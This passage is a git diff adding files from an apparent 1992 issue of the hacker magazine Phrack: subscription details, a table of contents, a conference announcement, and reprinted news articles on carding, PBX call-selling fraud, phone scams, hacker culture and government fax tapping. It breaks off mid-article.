+1.  Send a piece of electronic mail to "LISTSERV@STORMKING.COM".  The mail
+    must be sent from the account where you wish Phrack to be delivered.
+
+2.  Leave the "Subject:" field of that letter empty.
+
+3.  The first line of your mail message should read:
+    SUBSCRIBE PHRACK <your name here>
+
+4.  DO NOT leave your address in the name field!
+    (This field is for PHRACK STAFF use only, so please use a full name)
+
+Once you receive the confirmation message, you will then be added to the Phrack
+Mailing List.  If you do not receive this message within 48 hours, send another
+message.  If you STILL do not receive a message, please contact
+"SERVER@STORMKING.COM".
+
+You will receive future mailings from "PHRACK@STORMKING.COM".
+
+If there are any problems with this procedure, please contact
+"SERVER@STORMKING.COM" with a detailed message.
+
+You should get a conformation message sent back to you on your subscription.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Table Of Contents
+ ~~~~~~~~~~~~~~~~~
+ 1. Introduction by Dispater and Phrack Staff                              12K
+ 2. Phrack Loopback by Phrack Staff                                        24K
+ 3. Phrack Pro-Phile on Shadow Hawk 1 by Dispater                           8K
+ 4. Network Miscellany V by Datastream Cowboy                              34K
+ 5. DIALOG Information Network by Brian Oblivion                           43K
+ 6  Centigram Voice Mail System Consoles by >Unknown User<                 36K
+ 7. Special Area Codes II by Bill Huttig                                   17K
+ 8. Air Fone Frequencies by Leroy Donnelly                                 14K
+ 9. The Open Barn Door by Douglas Waller (Newsweek)                        11K
+10. PWN/Part 1 by Datastream Cowboy                                        30K
+11. PWN/Part 2 by Datastream Cowboy                                        27K
+12. PWN/Part 3 by Datastream Cowboy                                        29K
+13. PWN/Part 4 by Datastream Cowboy                                        29K
+
+                                                                   Total: 314K
+
+               "Phrack.  If you don't get it, you don't get it."
+
+                            phracksub@stormking.com
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Somebody Watching?                                          Somebody Listening?
+
+                          *** Special Announcement ***
+
+               KNIGHT LIGHTNING TO SPEAK AT SURVEILLANCE EXPO '92
+                                 Washington, DC
+
+The Fourth Annual International Surveillance and Countersurveillance Conference
+and Exposition focusing on Information Security and Investigations Technology
+will take place at the Sheraton Premiere in Tysons Corner (Vienna), Virginia on
+August 4-7.
+
+The seminars are on August 7th and include Craig Neidorf (aka Knight Lightning)
+presenting and discussing the following:
+
+-    Are law enforcement and computer security officials focusing their
+     attention on where the real crimes are being committed?
+
+-    Should security holes and other bugs be made known to the public?
+
+-    Is information property and if so, what is it worth?
+
+     Experience the case that changed the way computer crime is investigated
+     and prosecuted by taking a look at one of America's most talked about
+     computer crime prosecutions:  United States v. Neidorf (1990).
+
+     Exonerated former defendant Craig Neidorf will discuss the computer
+     "hacker" underground, Phrack newsletter, computer security, and how it all
+     came into play during his 7 month victimization by some of our nation's
+     largest telephone companies and an overly ambitious and malicious federal
+     prosecutor.  Neidorf will speak about his trial in 1990 and how the court
+     dealt with complex issues of First Amendment rights, intellectual
+     property, and criminal justice.
+
+Security professionals, government employees, and all other interested parties
+are invited to attend.  For more information please contact:
+
+     American Technology Associates, Inc.
+     P.O. Box 20254
+     Washington, DC  20041
+     (202)331-1125 Voice
+     (703)318-8223 FAX
+_______________________________________________________________________________
diff --git a/phrack39/10.txt b/phrack39/10.txt
new file mode 100644
index 0000000..5e8c348
--- /dev/null
+++ b/phrack39/10.txt
@@ -0,0 +1,578 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Nine, File 10 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Issue XXXIX / Part One of Four       PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ To Some Hackers, Right And Wrong Don't Compute                    May 11, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Bruce V. Bigelow (San Diego Union-Tribune)
+ Special Thanks to Ripper of HALE
+
+The telephone call was anonymous, and the young, male voice was chatty and
+nonchalant.  He wanted to explain a few things about hacking, the black art of
+tapping into private computers.
+
+He was one of several hackers to call, both frightened and intrigued by a San
+Diego police investigation into an informal network of computer criminals using
+high-tech methods to make fraudulent credit-card purchases.  Detectives have
+seized a personal computer and other materials, and arrests are pending in San
+Diego and other parts of the country.
+
+"Half the time, it's feeding on people's stupidity," the anonymous hacker
+said, boasting that most computers can be cracked as easily as popping a beer.
+
+Hackers seem full of such bravado.  In their electronic messages and in
+interviews, they exaggerate and swagger.
+
+One message traveling the clandestine network notes:  "This text file contains
+extremely damaging material about the American Express account making
+algorithm.  I do not commit credit card fraud.  I just made up this scheme
+because I was bored.
+
+They form groups with names like "Legion of Doom" and "Masters of Deception,"
+and give themselves nicknames like Phiber Optik, Video Vindicator and Outlaw.
+They view themselves as members of a computer underground, rife with cat-and-
+mouse intrigue.
+
+For the most part, they are bring teenagers who are coming of age in a
+computer-crazy world.  Perhaps a generation ago, they tested their anti-
+authoritarian moxie by shoplifting or stripping cars.  But, as it has with
+just about everything else, the computer has made teenage rebellion easier.
+
+Nowadays, a teenager tapping on a keyboard in the comfort of his bedroom can
+trespass on faraway corporate computers, explore credit files and surf coast-
+to-coast on long-distance telephone lines.
+
+San Diego police say that gathering details from computerized files as credit-
+reporting agencies, hackers around the country have racked up millions of
+dollars in fraudulent charges -- a trick known as "carding."
+
+Conventual notions of right and wrong seem to go fuzzy in the ethereal realm
+that hackers call cyberspace, and authorities say the number of crimes
+committed by computer is exploding nationwide.
+
+Like many hackers, the callers says he's paranoid.  He won't give his name and
+refuses to meed in person.  Now a college student in San Diego, he says, he
+began hacking when he was 13, collecting data by computer like a pack rat.
+
+"I wanted to know how to make a bomb," he said with a laugh.
+
+Like other hackers, he believes their strange underground community is
+misunderstood and maligned.  Small wonder.
+
+They speak a specialized jargon of colons, slashes and equal signs.  They work
+compulsively -- sometimes obsessively -- to decipher and decode, the hacker
+equivalent of breaking and entering.  They exploit loopholes and flaws so they
+can flaunt their techno-prowess.
+
+"The basis of worth is what you know," the hacker says.  "You'll hear the term
+'lame' slung around a lot, especially if someone can't do too much."
+
+They exchange credit-card numbers by electronic mail and on digital bulletin
+boards set up on personal computers.  They trade computer access codes,
+passwords, hacking techniques and other information.
+
+But it's not as if everyone is a criminal, the anonymous hacker says.  What
+most people don't realize, he say, is how much information is out there --
+"and some people want things for free, you know?"
+
+The real question for a hacker, he says, is what you do with the information
+once you've got it.  For some, restraint is a foreign concept.
+
+RICH IN LORE
+
+Barely 20 years old, the history of hacking already is rich in lore.
+
+For example, John Draper gained notoriety by accessing AT&T long distance
+telephone lines for free by blowing a toy whistle from a bod of Cap'n Crunch
+cereal into the telephone.
+
+Draper, who adopted "Captain Crunch" as his hacker nickname, improved on the
+whistle with an electronic device that duplicated the flute like, rapid-fire
+pulses of telephone tones.
+
+Another living legend among hackers is a New York youth known as "Phiber
+Optik."
+
+"The guy has got a photographic memory,' said Craig Neidorf of Washington, who
+co-founded an underground hacker magazine called Phrack.  "He knows everything.
+He can get into anything."
+
+Phiber Optik demonstrated his skills during a conference organized by Harper's
+Magazine, which invited some of the nation's best hackers to "log on" and
+discuss hacking in an electronic forum.  Harper's published a transcript of the
+11-day discussion in it's March 1990 issue.
+
+One of the participants, computer expert John Perry Barlow, insulted Phiber
+Optik by saying some hackers are distinguished less by their intelligence than
+by their alienation.
+
+"Trade their modems for skateboards and only a slight conceptual shift would
+occur," Barlow tapped out in his message.
+
+Phiber Optik replied 13 minutes later by transmitting a copy of Barlow's
+personal credit history, which Harper's editors noted apparently was obtained
+by hacking into TRW's computer records.
+
+For people like Emmanuel Goldstein, true hacking is like a high-tech game of
+chess.  The game is in the mind, but the moves are played out across a vast
+electronic frontier.
+
+"You're not going to stop hackers from trying to find out things," said
+Goldstein, who publishes 2600 Magazine, the hacker quarterly, in Middle
+Island, New York.
+
+"We're going to be trying to read magnetic strips on cards," Goldstein said.
+"We're going to try to figure out how password schemes work.  That's not
+going to change.  What has to change is the security measures that companies
+have to take."
+
+ANGELHEADED HIPSTERS
+
+True hackers see themselves, in the words of poet Allen Ginsberg, as
+"Angelheaded hipsters burning for the ancient heavenly connection to the
+starry dynamo in the machinery of night."  These very words were used by Lee
+Felsenstein, designer of the Osborne-1 computer and co-founder of the Homebrew
+Computer Club.
+
+But security consultants and law enforcement officials say malicious hackers
+can visit havoc upon anyone with a credit card or driver's license.
+
+"Almost none of it, I would say less than 10 percent, has anything to do with
+intellectual exploration," said Gail Thackeray, a Phoenix prosecutor who has
+specialized in computer crimes.  "It has to do with defrauding people and
+getting stuff you want without paying for it."
+
+Such crimes have mushroomed as personal computers have become more affordable
+and after the break up of AT&T made it more difficult to trace telephone calls,
+Thackeray said.
+
+Even those not motivated by financial gain show a ruthlessness to get what they
+want, Thackeray said.
+
+"They'll say the true hacker never damages the system he's messing with,"
+Thackeray said, "but he's willing to risk it."
+
+Science-fiction writer Bruce Sterling said he began getting anonymous calls
+from hackers after an article he wrote about the "CyberView 91" hacker
+convention was published in Details Magazine in October.
+
+The caller's were apparently displeased with Sterling's article, which noted,
+among other things, that the bustling convention stopped dead for the season's
+final episode of "Star Trek: The Next Generation."
+
+"They were giving me some lip," Sterling said.  They showered him with
+invective and chortled about details from Sterling's personal credit history,
+which they had gleaned by computer.
+
+They also gained access to Sterling's long distance telephone records, and
+made abusive calls to many people who has spoken to Sterling.
+
+"Most of the news stories I read simplify the problem to the point of saying
+that a hacker is a hacker is a hacker," said Donn Parker, a computer security
+consultant with SRI International in Menlo Park.
+
+"In real life, what we're dealing with is a very broad spectrum of
+individuals," Parker says.  "It goes all the way from 14-year olds playing
+pranks on their friends to hardened juvenile delinquents, career criminals and
+international terrorists."
+
+Yet true hackers have their own code of honor, Goldstein says.  Computer
+trespassing is OK, for example, but altering or damaging the system is wrong.
+
+Posing as a technician to flim-flam access codes and passwords out of
+unsuspecting computers users is also OK.  That's called "social engineering."
+
+"They're simply exploring with what they've got, weather it's exploring a
+haunted house or tapping into a mainframe," Goldstein said.
+
+"Once we figure things out, we share the information, and of course there are
+going to be those people that abuse that information," Goldstein added.
+
+It is extremely easy to break into credit bureau computers, Goldstein says.
+But the privacy being violated belongs to individual Americans -- not credit
+bureaus.
+
+If anything, credit bureaus should be held accountable for not providing
+better computer security, Goldstein argues.
+_______________________________________________________________________________
+
+ Companies Fall Victim To Massive PBX Fraud                      April 20, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen & John F. McMullen (Newsbytes)
+
+NEW YORK CITY -- Appearing on the WBAI radio show "Off The Hook," New York
+State Police senior investigator Donald Delaney discussed the movement of
+organized crime groups into telecommunications fraud and warned the public
+of the dangers of such practices as "shoulder surfing."
+
+Delaney said that corporations are being victimized to the tune of millions of
+dollars by unauthorized persons "outdialing" through their private branch
+exchanges (PBXs).  He traced the case of Data Products, a computer peripheral
+firm, that did not even seem aware that calls could be routed from the outside
+through their switchboard to foreign countries.  It was only, according to
+Delaney, when it received a monthly telephone bill of over $35,000 that it
+perceived a problem.
+
+"It was at 5:10 PM on a certain date that Liriano finally, after weeks of
+trying, was able to obtain an outside dial tone on Data Products 800 number.
+Subsequent investigation showed that thousands of calls using a 9600 baud modem
+as well as manually placed calls had been made to the 800 number.  At 7:30 the
+same evening, a call using the Data Products number was placed to the Dominican
+Republic from a telephone booth near Liriano's house.  Within a few hours,
+calls were placed from phones all around the neighborhood -- and, within a
+week, calls began being placed from booths all around Manhattan," Delaney
+related.
+
+Phiber Optik, another studio guest and a convicted computer intruder previously
+arrested by Delaney, commented, "I'm glad that Mr. Delaney didn't refer to
+these people as hackers, but identified them for what they are:  Sleezy common
+criminals.  What these people are doing requires no super computer knowledge
+nor desire to learn.  They are simply using computers and telephones to steal."
+
+Delaney agreed, saying, "The people actually selling the calls, on the street
+corner, in their apartments, or, in the case of cellular phones, in parked
+cars, don't have to know anything about the technology.  They are given the
+necessary PBX numbers and codes by people higher up in the group and they just
+dial the numbers and collect the money.  In the case of the re-chipped or clone
+cellular phones, they don't even have to dial the numbers."
+
+Delaney added, "These operations have become very organized very rapidly.  I
+have arrested people that have printed revenue goals for the current month,
+next six months, and entire year -- just like any other franchise operation.
+I'm also currently investigating a murder of a call-seller that I arrested last
+October.  He was an independent trying to operate in a highly organized and
+controlled section of Queens.  His pursuit of an independent career may well
+have been responsible for his death."
+
+Off The Hook host Emmanuel Goldstein asked Delaney what responsibility that the
+PBX companies bear for what seems to be rather easy use of their systems for
+such activity.  Delaney responded that he thought that the companies bear at
+least an ethical and moral responsibility to their clients to insure that they
+are aware of their exposure and the means that they must take to reduce the
+exposure.  "As far as criminal and civil responsibility for the security of the
+system, there are no criminal statues that I am aware of that would hold the
+PBX companies criminally liable for failure to insure proper security.  On the
+civil side, I think that the decision in the AT&T suit about this very topic
+will shed some light of legal responsibility."
+
+Goldstein also brought up the difficulties that some independent "customer-
+owned coin-operated" telephones (COCOTs) cause for customers.  "The charges are
+often exorbitant, access to AT&T via 10288 is sometimes blocked, there is not
+even the proper access to 911 on some systems, and some either block 800 calls
+or actually try to charge for the connection to the 800 numbers.
+
+"We've even found COCOTs that, on collect calls, put the charges through when
+an answering machine picks up and the caller hangs up after realizing that no
+one is home. They are set up to start billing if a human voice is heard and the
+caller doesn't hang up within 5 or 10 seconds."
+
+Delaney agreed that the COCOTS that behave in this fashion are an ongoing
+problem for unsuspecting users, but said that he has received no complaints
+about illegal behavior.  He said, however, that he had received complaints
+about fraudulent operation of 540 numbers -- the local New York equivalent of a
+900 number.  He said "most people don't realize that a 540 number is a
+chargeable number and these people fall victim to these scams.  We had one case
+in which a person had his computer calling 8,000 phone numbers in the beeper
+blocks each night.  The computer would send a 540 number to the beepers.
+People calling the number would receive some innocuous information and, at the
+end of the month a $55 charge on her/his telephone bill."
+
+Delaney continued, "The public has much to be worried about related to
+telephone fraud, particularly in New York City which can be called "Fraud
+Central, USA."  If you go into the Port Authority Bus Terminal and look up in
+the balcony, you will see rows of people "shoulder surfing" with binoculars.
+They have binoculars or telescopes trained on the public telephones.  When they
+see a person making a credit card call, they repeat the numbers into a tape
+recorder.  The number is then sold and, within a few days, it is in use all
+around the city.  People should always be aware of the possibility of shoulder
+surfers in the area."
+
+Goldstein returned to the 540 subject, pointing out that "because so many
+people don't realize that it is a billable number, they get caught by ads and
+wind up paying for scam calls.  We published a picture in 2600 Magazine of a
+poster seen around New York, advertising  apartment rental help by calling a
+540 number.  In very tiny print, almost unreadable, it mentions a charge.
+People have to be very careful about things like this."
+
+Delaney agreed, saying, "The 540 service must say within the first 10 seconds
+that there is a charge, how much it is, and that the person can hang up now
+without being charged -- the guy with the beeper scam didn't do that and that
+was one of the reasons for his arrest.  Many of the services give the charge so
+fast and mix it in with instructions to stay on for a free camera or another
+number to find out about the vacation that they have won that they miss the
+charges and wind up paying.  The 540 person has, although he may be trying to
+defraud, complied with the letter of the law and it might be difficult to
+prosecute him.  The average citizen must therefore be more aware of these scams
+and protect themselves."
+
+Goldstein, Phiber Optik, and Delaney spent the remainder of the show answering
+listener questions. Off The Hook is heard every Wednesday evening on New York
+City's WBAI (99.5 FM).  Recent guests have included Mike Godwin, in-house
+counsel of the Electronic Frontier Foundation; and Steve Jackson, CEO of Steve
+Jackson Games.
+_______________________________________________________________________________
+
+ Changing Aspects Of Computer Crime Discussed At NYACC             May 15, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Barbara E. McMullen (Newbytes)
+
+New York City -- Donald Delaney, New York State Police senior investigator, and
+Mike Godwin, in-house counsel, Electronic Frontier Foundation (EFF), speaking
+to the May meeting of the New York Amateur Computer Club (NYACC), agreed that
+the entrance of organized crime into telecommunications fraud has made the
+subject of computer crime far different than that discussed just a year ago at
+a similar meeting.
+
+Newsbytes New York bureau chief John McMullen, moderating the discussion,
+recalled that Delaney in last year's appearance had called for greater
+education of law enforcement officers in technological areas, the establishment
+of a New York State computer crime lab, outreach by law enforcement agencies to
+the public to heighten awareness of computer crime and the penalties attached
+-- items that have all come to pass in the ensuing 12 months.  He also
+mentioned that issues involving PBX & cellular phone fraud, privacy concerns
+and ongoing debate over law enforcement wiretapping & decryption capabilities
+have replaced the issues that received most of the attention at last year's
+meeting.
+
+Delaney agreed with McMullen, saying that there has been major strides made in
+the education of law enforcement personnel and in the acquisition of important
+tools to fight computer crime.  He said that the practice of "carding" -- the
+purchasing of goods, particularly computer equipment, has become a much more
+major problem than it was a year ago and that many more complaints of such
+activities are now received.
+
+He added that "call-selling" operations, the making of international telephone
+calls to foreign countries for a fee, through the fraudulent use of either a
+company's private branch exchange (PBX) or an innocent party's cellular phone
+account, has become so lucrative that arrested suspects have told him that
+"they are moving from drug sales to this type of crime because it is less
+dangerous and more rewarding."
+
+Delaney pointed out, however, that one of his 1991 arrests had recently been
+murdered, perhaps for trying to operate as an independent in an area that now
+seems to be under the control of a Columbian mob "so maybe it's not going to
+continue to be less dangerous."
+
+Delaney also said that PBX fraud will continue to be a problem until the
+companies using PBX systems fully understand the system capabilities and take
+all possible steps to insure security.  "Many firms don't even know that their
+systems have out-dialing capabilities until they get it with additional monthly
+phone charges of upwards of $35,000.  They don't realize that the system has
+default passwords that are supposed to be changed," he said, "It finally hits
+some small businesses when they are bankrupted by the fraudulent long-distance
+charges."
+
+Godwin, in his remarks, expressed concern that there is not sufficient
+recognition of the uniqueness of BBS and conferencing systems and that,
+therefore, legislators possibly will make decisions based on misunderstandings.
+He said "Telephone conversations, with the exception of crude conference call
+systems are 'one-to-one' communications.  Newspapers and radio & telephone are
+"one-to-many" systems but BBS" are "many-to-many" and this is different.  EFF
+is interested in seeing that First Amendment protection is understood as
+applying to BBSs."
+
+He continued "We also have a concern that law enforcement agencies will respond
+to the challenges of new technology in inappropriate ways.  The FBI and Justice
+Department, through the 'Digital Telephony Initiative' have requested that the
+phone companies such at AT&T and Sprint be required to provide law enforcement
+with the a method of wire-tapping in spite of technological developments that
+make present methods less effective.
+
+"Such a procedure would, in effect, make the companies part of the surveillance
+system and we don't think that that is their job.  We think that it is up to
+law enforcement to develop their own crime-fighting tools.  When the telephone
+was first developed it made it more difficult to catch crooks.  They no longer
+had to stand around together to plan foul deeds; they could do it by telephone.
+Then the government discovered wiretapping and was able to respond.
+
+"This ingenuity was shown again recently when law enforcement officials,
+realizing that John Gotti knew that his phones were tapped and discussed
+wrongdoings outdoors in front of his house, arranged to have the lampposts
+under which Gotti stood tapped.  That, in my judgement, is a reasonable
+approach by law enforcement."
+
+Godwin also spoke briefly concerning the on-going debate over encryption.  "The
+government, through varies agencies such as NSA, keeps attempting to restrict
+citizens from cloaking their computer files or messages in seemingly
+unbreakable coding.  We think that people have rights to privacy and, should
+they wish to protect it by encoding computer messages, have a perfect right to
+do so."
+
+Bruce Fancher, sysop and owner of the new New York commercial BBS service,
+MindVox, and the last speaker in the program, recounted some of his experiences
+as a "hacker" and asked the audience to understand that these individuals, even
+if found attached to a computer system to which they should not legitimately
+access, are not malicious terrorists but rather explorers.  Fancher was a last
+minute replaced for well-known NY hacker Phiber Optik who did not speak, on the
+advice of his attorney, because he is presently the subject of a Justice
+Department investigation.
+
+During the question and answer period, Delaney suggested that a method of
+resolving the encryption debate would be for third parties, such as banks and
+insurance companies, to maintain the personal encryption key for those using
+encryption.  A law enforcement official would then have to obtain a judge's
+ruling to examine or "tap" the key for future use to decipher the contents of
+the file or message.
+
+Godwin disagreed, saying that the third party would then become a symbol for
+"crackers" and that he did not think it in the country's best interests to just
+add another level of complexity to the problem.
+
+The question and answer period lasted for about 45 minutes with the majority of
+questions concerning encryption and the FBI wiretap proposal.
+_______________________________________________________________________________
+
+ Couple Of Bumbling Kids                                         April 24, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~
+ By Alfred Lubrano (Newsday)
+
+Two young Queens computer hackers, arrested for the electronic equivalent of
+pickpocketing credit cards and going on a computer shopping spree, will be
+facing relatively minor charges.
+
+Rudolph Loil, age 17, of Woodside, charged with attempted grand larceny, was
+released from police custody on a desk appearance ticket, a spokesman for the
+Queens district attorney's office said.
+
+A 15-year-old friend from Elmhurst who was also arrested was referred to Queens
+Family Court, whose proceedings are closed, the spokesman said.  He was not
+identified because of his age.
+
+Law-enforcement sources said they are investigating whether the two were
+"gofers" for adults who may have engaged them in computer crime, or whether
+they acted on their own.
+
+But Secret Service officials, called into the matter, characterized the case as
+"just a couple of bumbling kids" playing with their computer.
+
+The youths were caught after allegedly ordering $1,043 in computer equipment
+with a credit card number they had filched electronically from bank records,
+officials said.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ Hackers                                                         April 27, 1992
+ ~~~~~~~
+ Taken from InformationWeek (Page 8)
+
+Two teenagers were arrested last week in New York for using computers to steal
+credit card and telephone account numbers and then charging thousands of
+dollars worth of goods and phone calls to the burgled accounts.
+
+The two were caught only after some equipment they had ordered was sent to the
+home of the credit card holder whose account number had been pilfered.  Their
+arrests closely follow the discovery by the FBI of a nationwide ring of 1,000
+computer criminals, who charge purchases and telephone calls to credit card and
+phone account numbers stolen from the Equifax credit bureau and other sources.
+
+The discovery has already led to the arrest of two Ohio hackers and the seizure
+of computer equipment in three cities.
+_______________________________________________________________________________
+
+ DOD Gets Fax Evesdroppers                                       April 14, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Joseph Albright (Atlanta Journal and Constitution)(Page A12)
+
+Washington -- The Air Force is buying a new weapon to battle leaks:  A $30,000
+portable fax-tapper.
+
+Whenever someone transmits a fax, the fax-tapping device attached to the phone
+line will sneak an electronic copy and store it in a laptop computer's memory.
+Each of the new devices will enable an Air Force intelligence officer to
+monitor four telephones for "communications security" violations.
+
+Susan Hansen, a Defense Department spokeswoman, said last week that "there is
+no plan right at the moment" to install the devices in the Pentagon, whose
+top leaders have been outraged in recent weeks by leaks of classified policy
+documents to reporters.
+
+But she left open the possibility that some of them will be attached to
+sensitive military fax lines when the tapping devices are delivered to the Air
+Force six months to a year from now.
+
+"There are a lot of things that are under review here," she said after
+consulting with the Pentagon's telecommunications office.
+
+Plans to buy 40 of the devices were disclosed a few weeks ago in a contract
+notice from a procurement officer at Wright-Patterson Air Force Base near
+Dayton, Ohio. When contacted, a spokesman referred inquiries to the Air
+Force Intelligence Command at Kelly Air Force Base, Texas, which authorized the
+purchase.
+
+The Air Force Intelligence Command insisted that the devices will never be used
+for law enforcement purposes or even "investigations."
+
+"The equipment is to be used for monitoring purposes only, to evaluate the
+security of Air Force official telecommunications," said spokesman Dominick
+Cardonita.  "The Air Force intelligence command does not investigate."
+
+Mr. Cardonita said that, for decades, Air Force personnel in sensitive
+installations have been on notice that their voice traffic on official lines is
+subject to "communications security" monitoring.  The fax-tapper simply
+"enhances" the Air Force's ability to prevent "operational security"
+violations, he said.
+
+He estimated that the Air Force will pay $1.2 million under the contract, due
+to be let this June.  That averages out to $ 30,000 for each fax-tapper, but
+Mr. Cardonita said the price includes maintenance and training.
+
+Douglas Lang, president of Washington's High Technology Store and an authority
+on security devices, said that, so far as he knows, the Air Force is the first
+government agency to issue an order for fax-tapping machines.
+
+Mr. Lang said he has heard from industry sources that 15 contractors have
+offered to sell such devices to Wright-Patterson.
+
+"It is one more invasion of privacy by Big Brother," declared Mr. Lang, who
+predicted that the Air Force will use the devices mainly to catch anyone trying
+to leak commercially valuable information to contractors.
+
+Judging from the specifications, the Air Force wants a machine that can trace
+leaks wherever they might occur.
+
+Mr. Cardonita said the Air Force Intelligence Command will use the devices
+only when invited onto an Air Force base by a top commander.
+_______________________________________________________________________________
+
+ 900-Number Fraud Case Expected to Set a Trend                    April 2, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By David Thompson (Omaha <Nebraska> World-Herald)
+
+Civil court cases against abuses of 900-toll telephone number "will be slam
+dunks" as the result of the successful prosecution of a criminal case in Omaha
+over 900 numbers, a federal postal inspector said.
+
+Postal inspector Michael Jones said numerous civil actions involving 900
+numbers have been filed, including three recently in Iowa.  At least one civil
+case is pending in Nebraska, he said, and there may be others.
+
+Jones said the mail fraud conviction of Bedford Direct Mail Service Inc. of
+Omaha and its president, Ellis B. Goodman, 52, of 1111 South 113th.  Court, may
+have been the first criminal conviction involving 900 numbers.
+
+The conviction also figures in Nebraska Attorney General Don Stenberg's
+consumer protection program, which calls attention to abuses of 900 numbers, a
+staff member said.
+
+Among consumer complaints set to Stenberg's office, those about 900 numbers
+rank in the top five categories, said Daniel L. Parsons, senior consumer
+protection specialist.
+
+People are often lured by an offer of a gift or prize to dial a toll-free 800
+number, then steered to a series of 900 numbers and charged for each one,
+Parsons said.
+
+He said that during the last two years, state attorneys general have taken
+action against 150 organizations for allegedly abusing 900 numbers.
+_______________________________________________________________________________
diff --git a/phrack39/11.txt b/phrack39/11.txt
new file mode 100644
index 0000000..a47c2a3
--- /dev/null
+++ b/phrack39/11.txt
@@ -0,0 +1,513 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Nine, File 11 of 13
+
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+              PWN                                             PWN
+              PWN              Phrack World News              PWN
+              PWN                                             PWN
+              PWN        Issue XXXIX / Part Two of Four       PWN
+              PWN                                             PWN
+              PWN        Compiled by Datastream Cowboy        PWN
+              PWN                                             PWN
+              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
+
+
+ The Charge Of The Carders                                         May 26, 1992
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Joshua Quittner (<New York> Newsday)(Page 45)
+
+            Computer criminals are after your credit-card numbers --
+                         to steal with, sell and swap.
+
+THE KID, from Springfield Gardens, Queens, was a carder, of course.
+
+He was doing what carders do: trying to talk a salesman into overnight-
+expressing him a $4,000 computer system -- and using a stolen credit-card
+number for payment.
+
+The salesman was playing right along on the phone; he had also notified a co-
+worker to alert the New York State Police, said William Murphy, a customer
+service manager at Creative Computers, who described the event as it was
+unfolding on a recent Tuesday morning. Murphy said that on a typical day, as
+many as a dozen times, carders would call and try to buy everything from modems
+to whole computer systems.
+
+Murphy said that these days, the security people at Creative Computers are able
+to stop virtually all of them, either by not delivering the goods, or by
+delivering them UPS -- that's United Police Service.
+
+He sighed:  "It's amazing that they even try."
+
+But try they do.  And at other places, they're successful. Where once hacking
+into a credit bureau was a kind of rite of passage for computer intruders, who
+generally did little more than look up credit histories on people like Mike
+Dukakis, now computer criminals are mining national credit bureaus and mail-
+order houses, coming away with credit-card numbers to sell, swap or use for
+mail-order purchases.
+
+Underground electronic bulletin board systems help spread not only the
+passwords, but the techniques used to tap into different systems.  In
+San Diego on April 30, for instance, police raided a bulletin board called
+Scantronics, which offered among other things, step-by-step manuals on how to
+hack into Equifax Credit Information Services and TRW Information Services, the
+largest credit bureaus in the nation, the San Diego Tribune reported.
+
+"The potential for fraud is enormous, it's almost limitless," said Joel Lisker,
+Mastercard International's vice president of security and risk management, who
+noted that computer intruders accessed "thousands" of credit-card account
+numbers in another recent case.
+
+MASTERCARD is putting together a task force of its bank members to address the
+problem, and is considering inviting hackers in to learn what they can do to
+tighten up computer access to credit bureaus, he said.
+
+Mastercard estimates it lost $57 million to counterfeit scams last year; Lisker
+said it is impossible to say how much carders contributed.  But based on the
+volume of arrests lately, he figures carding has become a big problem.
+
+"It's kind of like a farmer that sees a rat," Lisker said.  "If he sees one, he
+knows he has several.  And if he sees several he knows he has a major
+infestation.  This is a major infestation."
+
+"It's clearly something we should be concerned about," agreed Scott Charney,
+chief of the U.S. Justice Department's new Computer Crime Unit.  Charney said
+that roughly 20 percent of the unit's current caseload involves credit-card
+fraud, a number that, if nothing else, colors the notion that all hackers are
+misunderstood kids, innocently exploring the world of computer networks.
+
+"Whether such noble hackers exist, the fact of the matter is we're seeing
+people out there whose motives are not that pure," he said.
+
+On May 11, New York State Police arrested three teenagers in Springfield
+Gardens when one of them went to pick up what he hoped was an Amiga 3000
+computer system from Creative Computers, at a local UPS depot.
+
+"What he wanted was a computer, monitor and modem.  What he got was arrested,"
+said John Kearey, a state police investigator who frequently handles computer
+and telecommunications crimes.  Police posed as UPS personnel and arrested the
+youth, who led them to his accomplices.
+
+Kearey said the teens said they got the stolen credit-card number from a
+"hacker who they met on a bridge, they couldn't remember his name" -- an
+interesting coincidence because the account number was for a next-door neighbor
+of one of the youths.  Police suspect that the teens, who claimed to belong to
+a small hacking group called the MOB (for Men of Business) either hacked into a
+credit bureau for the number, got someone else to do it, or went the low-tech
+route -- "dumpster diving" for used carbon copies of credit receipts.
+
+Indeed, most credit-card fraud has nothing to do with computer abusers.
+Boiler-room operations, in which fast-talking con men get cardholders to
+divulge their account numbers and expiration dates in exchange for the promise
+of greatly discounted vacations or other too-good-to-be-true deals, are far and
+away the most common scams, said Gregory Holmes, a spokesman for Visa.
+
+But carders have an advantage over traditional credit-card cheats:  By using
+their PCs to invade credit bureaus, they can find credit-card numbers for
+virtually anyone.  This is useful to carders who pick specific credit-card
+numbers based on location -- a neighbor is out of town for a week, which means
+all you have to do is get his account number, stake out his porch and sign for
+the package when the mail comes.  Another advantage is address and ZIP code
+verifications, once a routine way of double-checking a card's validity, are no
+longer useful because carders can get that information from an account record.
+
+"It's tough," Holmes said.  "Where it becomes a major problem is following the
+activity of actually getting the credit-card number; it's sent out on the black
+market to a vast group of people" generally over bulletin boards.  From there,
+a large number of purchases can be racked up in a short period of time, well
